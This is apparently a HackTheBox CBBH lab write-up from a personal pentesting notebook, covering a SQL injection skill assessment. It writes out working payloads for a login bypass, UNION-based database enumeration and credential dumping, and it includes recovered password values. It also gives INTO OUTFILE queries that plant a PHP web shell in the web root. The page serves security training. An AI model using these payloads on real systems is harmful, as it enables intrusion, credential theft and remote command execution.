brain_fuck
Checklists
Checklists
  • 📁What Is It
  • 🐧Linux Hardening
    • Privilege Escalation - Linux
      • SUDO
      • Kernel Exploit
      • SUID or SGID
      • Capabilities
      • Cron Jobs
      • PATH Hijacking
      • NFS (Network File Sharing)
  • 🖼️Windows Hardening
    • Privilege Escalation - Windows
      • Abusing dangerous privileges
      • Abusing Service Misconfigurations
      • Abusing Vulnerable Software
      • Recopilación de contraseñas en sitios habituales
      • Otras escaladas
    • AD - Active Directory
      • Basic AD
      • Samba & NTML Relay
      • Pass The Hash (PTH)
      • Kerberoasting Attack
      • Golden Ticket & Pass The Ticket (PTT)
  • 🧰Tools
    • Nmap
    • John the Ripper
      • zip2john
    • Gobuster
    • Smbmap
    • Smbclient
    • WPScan
    • GitHack
    • Chisel
      • Proxychains/Sock
    • Hydra
    • Msfvenom
    • CrackMapExec
    • Psexec
    • BloondHound
    • Rpcclient
    • Ldapdomaindump
    • Evil-wmr
    • Burpsuite
    • KeyHunter
  • 📡Ports
    • 21 - FTP
    • 22 - SSH
    • 25 - SMTP
    • 53 - DNS
    • 443 - HTTPS
    • 139;445 - SMB
    • 3389 - RDP
    • 5985 - Wsman
  • 🍎Red - Bash Scripting
    • Pivoting
  • 🧙‍♂️Pentesting Methodology
    • Pivoting
      • Ligolo-ng
  • 🌐OSINT
    • Gps-Coordinates
    • GPG
    • Sherlock
    • Whatsmyname
    • Wiggle
    • Image & Geospatial Intelligence
    • FFmpeg - Geolocating Videos
  • 🗒️TO-DO
  • 🕷️HTB-CBBH
    • Web Requests - Fundamentals
      • HTTP Fundamentals
        • HyperText Transfer Protocol (HTTP)
          • Hypertext Transfer Protocol Secure (HTTPS)
        • HTTP Requests and Responses
        • HTTP Headers
      • HTTP Methods
        • HTTP Methods & Codes
        • GET
        • POST
        • CRUD API
    • Introduction to Web Applications - Fundamentals
      • Front Components & Vulns
      • Back End Components & Vulns
    • Hacking WordPress
      • Info
      • Enumeration
      • Exploitin
    • Using Web Proxies
      • Web Proxy
      • Web Fuzzer
      • Extensions
    • Information Gathering - Web Edition
      • DNS & Subdomains
    • Attacking Web Applications with Ffuf
      • Fuzzing
    • JavaScript Deobfuscation
      • Deobfuscation & Decode
    • Cross-Site Scripting (XSS)
      • XSS Basics
      • XSS Phishing
      • Blind XSS - Session Hijacking
    • SQL Injection
      • Databases & Queries
      • SQL Injections
      • Exploitation
        • Database Enumeration
        • Reading Files
        • Writing Files
      • Skill Assessment
    • SQLMap Essentials
      • Building Attacks
Powered by GitBook
On this page
  1. HTB-CBBH
  2. SQL Injection

Skill Assessment

PreviousWriting FilesNextSQLMap Essentials

Last updated 4 days ago

First I can see a login, try to sqli basic -->

admin' or 1=1-- -

Then, i can see search panel and info of names, i test if this field is vulnerable:

It is vulnerable, true. Now i try to connect to unions select -->

ADAM' UNION SELECT 1,2,3,4,5-- -

Nice try daddy, now i list the secure_file_priv, to view if this field is vulnerable:

ADAM' UNION SELECT 1,2, variable_name, variable_value, 5 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -

Now, i try to upload a webshell -->

adam' union select "",'<?php system($_REQUEST[0]); ?>', "", "", "" into outfile '/var/www/html/shell.php'-- -

No problem, i will try display the bbdd and password of admin to login and do it upload

ADAM' UNION select 1,schema_name,3,4,5 from INFORMATION_SCHEMA.SCHEMATA-- -

List all bbdd, and see ilfreight and backup, nice. I see with database(), what ddbb is using this webapp:

ADAM' UNION select 1,database(),2,3,4-- -

NICE, now list all tables, columns and info -->

ADAM' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4,5 from INFORMATION_SCHEMA.TABLES where table_schema='ilfreight'-- -
ADAM' UNION select 1,2,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='users'-- -

Now we can see all content off this columns -->

ADAM' UNION select 1,2, username, password, 4 from ilfreight.users-- -

adam : 1be9f5d3a82847b8acca40544f953515

Try to login again into the login... but...

NO SURRENDER! I will try to enum the backup bbdd

ADAM' UNION select 1,2,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='admin_bk'-- -

Now, i list the columns:

ADAM' UNION select 1,2,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='admin_bk'-- -

To the end, i display all data of this comuns -->

ADAM' UNION select 1,2, username, password, 4 from backup.admin_bk-- -

admin : Inl@n3_fre1gh7_adm!n

NOW YEAAAHHH, but... it is the same user i have... sooooo.

There are something i am doing bad... The above responde message is: Permsion Denied... Yeah... but... the query is it:

' union select "",'<?php system($_REQUEST[0]); ?>', "","", "" into outfile '/var/www/html/shell.php'-- -

"Cant create to file in /var/www/html", but... i am in /dashboad/dasboard.php, try it -->

' union select "",'<?php system($_REQUEST[0]); ?>', "","", "" into outfile '/var/www/html/dashboard/shell.php'-- -

NOTHING ERROR!! Search the file

HOLY SH1T!! I NEED SLEEP

🕷️